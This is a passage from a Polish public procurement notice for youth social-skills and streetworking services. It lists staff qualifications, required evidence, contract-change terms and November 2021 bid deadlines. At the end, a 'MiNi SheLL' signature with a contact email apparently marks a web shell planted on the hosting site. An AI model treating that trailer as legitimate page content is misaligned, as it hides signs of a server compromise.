psychoprofilaktyka społeczna).<br/> <br/>Liczba lat doświadczenia liczona jest jako suma okresów pracy spełniającej wymagania powyższego warunku udziału. <br/><br/>5.2.	Część 2:<br/>W celu potwierdzenia spełniania tego warunku Wykonawca wykaże, że posiada odpowiedni zespół zapewniający zdolność do realizacji zamówienia, tj. w skład zespołu skierowanego do realizacji zamówienia będzie wchodzić co najmniej 6 osób prowadzących formy wsparcia objęte przedmiotem zamówienia, posiadające minimum 2-letnie doświadczenie (każda) w pracy z dziećmi lub młodzieżą w zakresie: <br/>a) usług trenera kompetencji społecznych / socjoterapeuty (co najmniej 1 osoba legitymująca się wykształceniem wyższym magisterskim oraz posiadająca ukończony kurs trenera w zakresie kompetencji społecznych lub osoba legitymująca się wykształceniem wyższym magisterskim na kierunku pedagogika, psychologia lub pokrewne i/lub ukończone studia podyplomowe /kurs kwalifikacyjny z zakresu socjoterapii dzieci i młodzieży).<br/>b) usług w zakresie streetworkingu (co najmniej 5 osób w tym co najmniej 2 osoby posiadające ukończony kurs/szkolenie w zakresie streetworkingu/pedagogiki ulicy):<br/>1)	animator zabaw co najmniej 1 osoba legitymująca się wyksztalceniem wyższym na kierunku Pedagogika lub osoba z ukończonym dowolnym kierunkiem i posiadająca przygotowanie pedagogiczne oraz osoba z ukończonym min. 20-godzinnym kursem animatora czasu wolnego/ pedagogiki zabaw (certyfikat/ zaświadczenie).<br/>2)	trener sztuki cyrkowej co najmniej 1 osoba legitymująca się wykształceniem wyższym na kierunku Pedagogika lub osoba z ukończonym dowolnym kierunkiem i posiadająca przygotowanie pedagogiczne oraz osoba z ukończonym kursem/szkoleniem z zakresu: pedagogiki cyrku/sztuki cyrkowej (certyfikat/ zaświadczenie),<br/>3)	trener fitness co najmniej 1 osoba posiadająca wykształcenie min. średnie oraz certyfikat instruktora /trenera fitness,<br/>4)	instruktor tańca street dance co najmniej 1 osoba posiadająca wykształcenie min. średnie oraz certyfikat instruktora /trenera tańca,<br/>5)	instruktor nauki pływania co najmniej 1 osoba posiadająca wykształcenie min. średnie oraz certyfikat instruktora pływania,<br/>6)	fotograf co najmniej 1 osoba posiadająca wykształcenie min. średnie i ukończony kurs/szkoła policealna z zakresu fotografii (certyfikat, zaświadczenie),<br/>7)	plastyk co najmniej 1 osoba legitymująca się wykształceniem wyższym na kierunku Pedagogika lub osoba z ukończonym dowolnym kierunkiem i posiadająca przygotowanie pedagogiczne i kursu rysunku/arteterapii/ grafiki inne pokrewne,<br/>8)	trener śpiewu co najmniej 1 osoba posiadająca wykształcenie min. średnie i/lub ukończenie szkoły muzycznej/kursu/szkolenia instruktorskiego nauki śpiewu,<br/>9)	instruktor gry na gitarze co najmniej 1 osoba posiadająca wykształcenie min. średnie i/lub ukończenie szkoły muzycznej/kursu/szkolenia instruktorskiego nauki gry na instrumencie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.Oświadczenie, o którym mowa w art. 125 ust 1 ustawy Pzp, o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu w zakresie określonym przez Zamawiającego.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">.1.	wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat (liczonych wstecz od dnia, w którym upływa termin składania ofert), a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy (liczonych wstecz od dnia, w którym upływa termin składania ofert);<br/>Jeżeli wykonawca powołuje się na doświadczenie w realizacji usług, wykonywanych wspólnie z innymi wykonawcami, wykaz ma dotyczyć usług, w których wykonaniu wykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń powtarzających się lub ciągłych, w których wykonywaniu bezpośrednio uczestniczył lub uczestniczy.<br/><br/>2.	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, podmiotowe środki dowodowe, o których mowa w pkt. 2.1. – 2.2. składa odpowiednio Wykonawca / Wykonawcy, który/którzy wykazuje/ą spełnianie warunku, w zakresie i na zasadach opisanych w pkt VII i VIII IDW.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie o którym mowa w art. 117 ust. 4 Ustawy Pzp, z którego wynika, które usługi wykonają poszczególni Wykonawcy.<br/>Wzór oświadczenia zawarto w Części IV SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Strony mogą dokonać zmian w umowie, w przypadku zaistnienia okoliczności dopuszczonych przepisem art. 455 ust. 1 i 2 ustawy Pzp. <br/>2.	Na podstawie art. 455 ust. 1 pkt 1 ustawy Pzp określa się następujące okoliczności i warunki zmiany umowy:<br/>1)	zmiana umowy jest dopuszczalna w związku ze zmianą umowy o dofinasowanie projektu, w ramach którego realizowany jest Przedmiot umowy, gdzie zmiana będzie polegać będzie na dostosowaniu treści umowy do warunków wynikających ze zmiany umowy o dofinansowanie;<br/>2)	zmiana umowy jest dopuszczalna w związku ze zmianą powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy, gdzie zmiana będzie polegać będzie na dostosowaniu treści umowy do zmienionych przepisów prawa, bez wpływu na wysokość wynagrodzenia Wykonawcy;<br/>3)	zmiana umowy jest dopuszczalna, gdy zaistnieją nowe, szczególne okoliczności, niezależne od Zamawiającego i Wykonawcy, uzasadniające zmiany terminów realizacji zadań lub umowy, przy czym zmiany terminów mogą być dokonane tylko w zakresie wynikającym z tych okoliczności, bez wpływu na wysokość wynagrodzenia Wykonawcy;<br/>4)	zmiana umowy jest dopuszczalna, gdy zaistnieje siła wyższa mająca wpływ na realizację umowy, przy czym za siłę wyższą (w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia, epidemie, pandemie), gdzie zmiana będzie polegać będzie na dostosowaniu treści umowy celem uchylenia negatywnych skutków siły wyżej na realizację Przedmiotu umowy, bez wpływu na wysokość wynagrodzenia Wykonawcy.<br/>3.	Zamawiający dopuszcza możliwość zmiany umowy w zakresie wysokości wynagrodzenia, o którym mowa w § 6 ust. 1-3 Część III SWZ<br/>4. Zmiany umowy okresla § 6 Część III SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-12 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/Postepowania/Utworz</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-12 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-11</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com